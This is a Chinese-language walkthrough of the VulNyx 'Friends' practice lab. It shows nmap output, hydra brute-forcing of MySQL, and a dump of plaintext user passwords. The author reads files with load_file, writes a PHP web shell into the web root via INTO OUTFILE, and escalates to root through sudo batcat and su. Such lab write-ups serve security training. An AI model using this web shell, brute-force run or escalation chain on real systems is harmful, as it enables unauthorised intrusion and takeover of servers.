首页 靶场练习 VulNyx Easy

# 靶场搭建

下载:Friends

Nat,IP: 192.168.1.146

# 渗透过程

# 信息初收集

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)
|   256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)
|_  256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519)
80/tcp   open  http    Apache httpd 2.4.56 ((Debian))
|_http-title: Friends
|_http-server-header: Apache/2.4.56 (Debian)
3306/tcp open  mysql   MySQL 5.5.5-10.5.19-MariaDB-0+deb11u2
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.5-10.5.19-MariaDB-0+deb11u2
|   Thread ID: 6
|   Capabilities flags: 63486
|   Some Capabilities: Support41Auth, SupportsLoadDataLocal, Speaks41ProtocolNew, IgnoreSigpipes, InteractiveClient, SupportsCompression, ODBCClient, SupportsTransactions, IgnoreSpaceBeforeParenthesis, LongColumnFlag, Speaks41ProtocolOld, ConnectWithDatabase, DontAllowDatabaseTableColumn, FoundRows, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins
|   Status: Autocommit
|   Salt: |d`4"M<&Fmrvz"837Z@o
|_  Auth Plugin Name: mysql_native_password

敏感路径无,什么都没有,图片也很干净

搜图得到图中俩人的名字: beavisbutthead

爆破数据库吧

拿到密码: rocknroll

┌──(root㉿kali)-[~]
└─# hydra -l beavis -P /usr/share/wordlists/rockyou.txt 192.168.1.146 mysql -I -t 64
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-05-19 02:32:27
[INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections)
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task
[DATA] attacking mysql://192.168.1.146:3306/
[3306][mysql] host: 192.168.1.146   login: beavis   password: rocknroll
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-05-19 02:32:47

登录拿到数据库信息:

┌──(root㉿kali)-[~]
└─# mysql -h 192.168.1.146 -u beavis -p
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 6
Server version: 10.5.19-MariaDB-0+deb11u2 Debian 11
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| friends            |
| information_schema |
| mysql              |
| performance_schema |
+--------------------+
4 rows in set (0.001 sec)
MariaDB [(none)]> use friends;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [friends]> show tables;
+-------------------+
| Tables_in_friends |
+-------------------+
| users             |
+-------------------+
1 row in set (0.001 sec)
MariaDB [friends]> select * from users;
+------+----------+-----------+
| id   | username | password  |
+------+----------+-----------+
|    1 | beavis   | b3@v1$123 |
|    2 | butthead | BuTTh3@D! |
+------+----------+-----------+
2 rows in set (0.006 sec)
MariaDB [friends]>
登录不了 ssh
可以读取文件: select load_file('/etc/passwd');
读取 index.php 获取新的提示 /M3t4LL1c@
写 shell 进去: select "<?php system($_GET['cmd']); ?>" into outfile "/var/www/html/M3t4LL1c@/shell.php";/var/www/html/ 目录没权限
弹 shell 出来, 拿到初步的 shell
# 提权
sudo 有 batcat
sudo -u beavis batcat --paging always /etc/profile
!/bin/sh
# 切换到 butthead 账户,密码之前有
beavis@friends:~$ su butthead
Password: 
butthead@friends:/home/beavis$ sudo -l
[sudo] password for butthead: 
Matching Defaults entries for butthead on friends:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User butthead may run the following commands on friends:
    (root) PASSWD: /usr/bin/su
butthead@friends:/home/beavis$ sudo su
root@friends:/home/beavis#
拿到 root 权限
# 小结
特么得还要去搜图。